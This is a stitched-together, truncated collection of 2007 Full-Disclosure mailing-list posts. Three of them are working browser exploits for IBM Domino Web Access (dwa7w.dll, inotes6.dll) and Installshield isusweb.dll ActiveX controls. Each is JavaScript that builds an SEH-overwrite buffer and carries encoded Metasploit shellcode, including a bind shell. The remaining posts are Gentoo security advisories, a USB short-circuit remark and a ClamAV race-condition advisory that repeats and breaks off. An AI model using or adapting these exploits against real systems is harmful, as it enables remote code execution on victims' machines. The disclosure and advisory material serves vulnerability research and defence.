[Full-disclosure] IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit
This one is unicode based, so is inotes6w. Exploitation for inotes6w is probably the same just with a different offset. Code is inline and attached. - IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit function Check() { var buf = unescape("%u4141"); while (buf.length <= 2461) buf = buf + unescape("%u4141"); // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%u%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" + "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" + "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" + "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" + "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" + "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" + "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" + "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" + "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" + "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" + "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" + "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" + "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" + "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" + "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" + "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" + "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" + "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" + "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" + "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" + "%u314e%u7475%u7038%u7765%u4370"); // win32_bind - EXITFUNC=seh LPORT= Size=696 Encoder=Alpha2 http://metasploit.com var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%u%u4949%u4949%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" + "%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" + "%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" + "%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" + "%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" + "%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" + "%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" + "%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" + "%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" + "%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" + "%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" + "%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" + "%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" + "%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" + "%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" + "%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" + "%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" + "%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" + "%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" + "%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" + "%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" + "%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" + "%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" + "%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" + "%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" + "%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" + "%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" + "%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" + "%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" +
[Full-disclosure] Installshield isusweb.dll Buffer Overflow Exploit
MC has already made a Metasploit module for this, and Symantec has released BloodHound signatures for general isusweb abuse. Code is inline and attached. Macrovision Installshield isusweb.dll SEH Overwrite Exploit function Check() { var buf = 'A'; while (buf.length <= 599) buf = buf + 'A'; // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" + "%4e%31%75%74%38%70%65%77%70%43"); // win32_bind - EXITFUNC=seh LPORT= Size=696 Encoder=Alpha2 http://metasploit.com var shellcode2 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" + "%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" + "%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" + "%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" + "%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" + "%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" + "%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" + "%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" + "%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" + "%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" + "%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" + "%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" + "%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" + "%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" + "%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" + "%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" + "%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" + "%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" + "%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" + "%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" + "%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" + "%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" + "%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" + "%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" + "%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" + "%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" + "%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" + "%4f%58%50%63%58%4b%55%73%79%4c%46%41%59%63%67%4b" + "%4f%78%56%76%30%53%64%41%44%33%65%79%6f%4e%30%4e" + "%73%71%78%58%67%61%6
Re: [Full-disclosure] usb shorting to ground
Todd Troxell wrote: > I discovered rather inadvertently that laptops do not enjoy having > their USB VCC shorted to GND one bit. It is a sure DoS, in fact if > the machine has a stupid power supply, it could result in permanent > damage. It is kind of scary for kiosk machines like the those > ubiquitous Kodak photo centers. > > I give you, the usb pwner. It could even hide inside a legitimate > stick: > > USB Pwner schematic > > VCC > D+ ---(nc)| > D ---(nc)| > GND See also ... http://www.hackerslab.org/images/geek/2005/may/etherkiller.jpg cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IBM Domino Web Access inotes6.dll SEH Overwrite Exploit
My first attempt at an SEH overwrite exploit. Anyhow, I first posted about this issue regarding version 7 of this control, Will Dormann of the CERT/CC discovered versions 6 and 6.5 are vulnerable too, see http://www.kb.cert.org/vuls/id/963889. Dwa7w.dll and inotes6w.dll are unicode, thats my next project. Code is inline and attached. - IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit function Check() { var buf = 'A'; while (buf.length <= 3119) buf = buf + 'A'; // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" + "%4e%31%75%74%38%70%65%77%70%43"); // win32_bind - EXITFUNC=seh LPORT= Size=696 Encoder=Alpha2 http://metasploit.com var shellcode2 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" + "%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" + "%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" + "%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" + "%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" + "%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" + "%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" + "%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" + "%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" + "%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" + "%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" + "%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" + "%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" + "%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" + "%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" + "%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" + "%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" + "%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" + "%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" + "%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" + "%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" + "%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" + "%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" + "%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" + "%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" + "%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" + "%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" +
[Full-disclosure] [ GLSA 200712-25 ] OpenOffice.org: User-assisted arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-25 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenOffice.org: User-assisted arbitrary code execution Date: December 30, 2007 Bugs: #200771, #201799 ID: 200712-25 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An unspecified vulnerability has been reported in OpenOffice.org, possibly allowing for the execution of arbitrary code. Background == OpenOffice.org is an open source office productivity suite, including word processing, spreadsheet, presentation, drawing, data charting, formula editing, and file conversion facilities. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-office/openoffice < 2.3.1 >= 2.3.1 2 app-office/openoffice-bin < 2.3.1 >= 2.3.1 3 dev-db/hsqldb < 1.8.0.9 >= 1.8.0.9 --- 3 affected packages on all of their supported architectures. --- Description === The HSQLDB engine, as used in Openoffice.org, does not properly enforce restrictions to SQL statements. Impact == A remote attacker could entice a user to open a specially crafted document, possibly resulting in the remote execution of arbitrary Java code with the privileges of the user running OpenOffice.org. Workaround == There is no known workaround at this time. Resolution == All OpenOffice.org users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/openoffice-2.3.1" All OpenOffice.org binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/openoffice-bin-2.3.1" All HSQLDB users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-db/hsqldb-1.8.0.9" References == [ 1 ] CVE-2007-4575 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4575 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-25.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHd+PZuhJ+ozIKI5gRAnw3AKCTR9OoJrvosyOIWsPR75YN/tIE1QCgmLpL hRdVKFeTyqcR6PIKgWqWExw= =6HQd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200712-24 ] AMD64 x86 emulation GTK+ library: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: AMD64 x86 emulation GTK+ library: User-assisted execution of arbitrary code Date: December 30, 2007 Bugs: #201860 ID: 200712-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflow vulnerabilities in the AMD64 x86 emulation GTK+ libraries may result in the execution of arbitrary code in applications using Cairo. Background == Cairo is a 2D vector graphics library with cross-device output support. The AMD64 x86 emulation GTK+ library packages Cairo libraries for 32bit x86 emulation on AMD64. Affected packages = --- Package / Vulnerable / Unaffected --- 1 emul-linux-x86-gtklibs < 20071214 >= 20071214 --- # Package 1 only applies to AMD64 users. Description === The Cairo versions used by the AMD64 x86 emulation GTK+ libraries were vulnerable to integer overflow vulnerabilities (GLSA 200712-04). Impact == A remote attacker could entice a user to view or process a specially crafted PNG image file in an application linked against Cairo, possibly leading to the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All AMD64 x86 emulation GTK+ library users should upgrade to the latest version: # emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-gtklibs-20071214" References == [ 1 ] GLSA 200712-04 http://www.gentoo.org/security/en/glsa/glsa-200712-04.xml Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-24.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200712-23 ] Wireshark: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Wireshark: Multiple vulnerabilities Date: December 30, 2007 Bugs: #199958 ID: 200712-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in Wireshark, allowing for the remote execution of arbitrary code and a Denial of Service. Background == Wireshark is a network protocol analyzer with a graphical front-end. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-analyzer/wireshark < 0.99.7>= 0.99.7 Description === Multiple buffer overflows and infinite loops were discovered in multiple dissector and parser components, including those for MP3 and NCP (CVE-2007-6111), PPP (CVE-2007-6112), DNP (CVE-2007-6113), SSL and iSeries (OS/400) Communication traces (CVE-2007-6114), ANSI MAP (CVE-2007-6115), Firebird/Interbase (CVE-2007-6116), HTTP (CVE-2007-6117), MEGACO (CVE-2007-6118), DCP ETSI (CVE-2007-6119), Bluetooth SDP (CVE-2007-6120), RPC Portmap (CVE-2007-6121), SMB (CVE-2007-6438), IPv6 amd USB (CVE-2007-6439), WiMAX (CVE-2007-6441), RPL (CVE-2007-6450), CIP (CVE-2007-6451). The vulnerabilities were discovered by Stefan Esser, Beyond Security, Fabiodds, Peter Leeming, Steve and ainsley. Impact == A remote attacker could send specially crafted packets on a network being monitored with Wireshark or entice a user to open a specially crafted file, possibly resulting in the execution of arbitrary code with the privileges of the user running Wireshark (which might be the root user), or a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All Wireshark users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-0.99.7" References == [ 1 ] CVE-2007-6111 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6111 [ 2 ] CVE-2007-6112 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6112 [ 3 ] CVE-2007-6113 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6113 [ 4 ] CVE-2007-6114 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6114 [ 5 ] CVE-2007-6115 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6115 [ 6 ] CVE-2007-6116 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6116 [ 7 ] CVE-2007-6117 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6117 [ 8 ] CVE-2007-6118 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6118 [ 9 ] CVE-2007-6119 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6119 [ 10 ] CVE-2007-6120 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6120 [ 11 ] CVE-2007-6121 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6121 [ 12 ] CVE-2007-6438 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6438 [ 13 ] CVE-2007-6439 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6439 [ 14 ] CVE-2007-6441 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6441 [ 15 ] CVE-2007-6450 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6450 [ 16 ] CVE-2007-6451 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6451 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-23.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TK53 Advisory #2: Multiple vulnerabilities in ClamAV
TK53 Advisory #2 12/29/2007 - Multiple vulnerabilities in ClamAV * Authors: Roflek of TK53 <[EMAIL PROTECTED]>, Lolek of TK53 <[EMAIL PROTECTED]> * Affected program: ClamAV (http://www.clamav.net/) * Affected versions: 0.92 * Overwiew: 1) ClamAV uses own functions to create temporary files. One such routine is vulnerable to a race condition attack. 2) ClamAV fails to properly check for base64-UUEncoded files, allowing bypassing of the scanner through the use of such files. 3) The sigtool utility included in the ClamAV distribution fails to handle created files in a secure way. == == Race Condition Vulnerability Details == == $SOURCE/libclamav/others.c (line 488): int cli_gentempfd(const char *dir, char **name, int *fd) { *name = cli_gentemp(dir); if(!*name) return CL_EMEM; *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU); if(*fd == -1) { cli_errmsg("cli_gentempfd: Can't create temporary file %s: %s\n", *name, strerror(errno)); free(*name); return CL_EIO; } return CL_SUCCESS; } This function, cli_gentempfd, uses a custom function to generate a (more or less) unique file name which is then opened, and the file descriptor is returned via an output parameter. The problem with this code is that a race condition exists: if the attacker is able to guess the generated file name, he/she is able to create such a named file between the call of cli_gentemp() and open(), making it possible to overwrite arbitrary files to which the user that runs ClamAV has write access with temporary data. A solution to fix this problem is to use the O_EXCL option for open(). This option prevents that the file will be opened if it already exists. So, how does the file name generation happen? First, cli_gentemp() determines the temporary directory. Users of the cli_gentemp() function can specify their own custom temporary directory. If none is specified, then the content of the TMPDIR environment variable is used. If the environment variable is unset, then P_tmpdir resp. "/tmp" are used. The generated format of the file name is $TMPDIR/clamav-$HASH, where $HASH is generated from a fixed 16 byte "salt" and 32 (more or less) random bytes. The salt is defined in the following way: static unsigned char name_salt[16] = { 16, 38, 97, 12, 8, 4, 72, 196, 217, 144, 33, 124, 18, 11, 17, 253 }; The random bytes are generated with an internal function cli_rndnum() which looks like this: unsigned int cli_rndnum(unsigned int max) { struct timeval tv; gettimeofday(&tv, (struct timezone *) 0); srand(tv.tv_usec+clock()); return rand() % max; } As you can see, every time cli_rndnum() is called, the random number generator is reinitialized with the microsecond component of the current time and an "approximation of the processor time used by the program" using the clock() function. This takes away a lot of randomness from the value returned by cli_rndnum(): as seed, more or less public information which should be relatively easy to be guessed by the attacker is used, making it possible to guess the value returned by rand(). Also, since the random number generator is reseeded every time cli_rndnum() is called, every returned value is directly computed from the seed. In addition, cli_rndnum() uses the modulo operator to "cut off" the random number at a maximum value, which is discouraged by virtually every documentation of the rand() function. The publication "Numerical Recipes in C: The Art of Scientific Computing"[0] says about the use of rand(): "If you want to generate a random integer between 1 and 10, you should always do it by using high-order bits, as in j=1+(int) (10.0*rand()/(RAND_MAX+1.0)); and never by anything resembling j=1+(rand() % 10); (which uses lower-order bits)." The function cli_gentempfd() is used throughout the whole ClamAV source code in numerous places, which means that all these places are affected by the race conditions. Ironically, the code also uses cli_gentemp() in several places to generate a random file name and then passes the file name to call to open() with the O_EXCL option enabled. The race condition was introduced to the ClamAV source code on August 31st, 2007, in SVN revision 3196. The first release that contains the bug was 0.92. Since then, the code has remained in the trunk of the SVN repository. == == Base64 UUEncoded Files Scanner Bypassing Details == == ClamAV contains functionality to unpack and scan different types of files, such as archive files. Beside others, UUEncoded files
[Full-disclosure] TK53 Advisory #2: Multiple vulnerabilities in ClamAV
TK53 Advisory #2 12/29/2007 - Multiple vulnerabilities in ClamAV * Authors: Roflek of TK53 <[EMAIL PROTECTED]>, Lolek of TK53 <[EMAIL PROTECTED]> * Affected program: ClamAV (http://www.clamav.net/) * Affected versions: 0.92 * Overwiew: 1) ClamAV uses own functions to create temporary files. One such routine is vulnerable to a race condition attack. 2) ClamAV fails to properly check for base64-UUEncoded files, allowing bypassing of the scanner through the use of such files. 3) The sigtool utility included in the ClamAV distribution fails to handle created files in a secure way. == == Race Condition Vulnerability Details == == $SOURCE/libclamav/others.c (line 488): int cli_gentempfd(const char *dir, char **name, int *fd) { *name = cli_gentemp(dir); if(!*name) return CL_EMEM; *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU); if(*fd == -1) { cli_errmsg("cli_gentempfd: Can't create temporary file %s: %s\n", *name, strerror(errno)); free(*name); return CL_EIO; } return CL_SUCCESS; } This function, cli_gentempfd, uses a custom function to generate a (more or less) unique file name which is then opened, and the file descriptor is returned via an output parameter. The problem with this code is that a race condition exists: if the attacker is able to guess the generated file name, he/she is able to create such a named file between the call of cli_gentemp() and open(), making it possible to overwrite arbitrary files to which the user that runs ClamAV has write access with temporary data. A solution to fix this problem is to use the O_EXCL option for open(). This option prevents that the file will be opened if it already exists. So, how does the file name generation happen? First, cli_gentemp() determines the temporary directory. Users of the cli_gentemp() function can specify their own custom temporary directory. If none is specified, then the content of the TMPDIR environment variable is used. If the environment variable is unset, then P_tmpdir resp. "/tmp" are used. The generated format of the file name is $TMPDIR/clamav-$HASH, where $HASH is generated from a fixed 16 byte "salt" and 32 (more or less) random bytes. The salt is defined in the following way: static unsigned char name_salt[16] = { 16, 38, 97, 12, 8, 4, 72, 196, 217, 144, 33, 124, 18, 11, 17, 253 }; The random bytes are generated with an internal function cli_rndnum() which looks like this: unsigned int cli_rndnum(unsigned int max) { struct timeval tv; gettimeofday(&tv, (struct timezone *) 0); 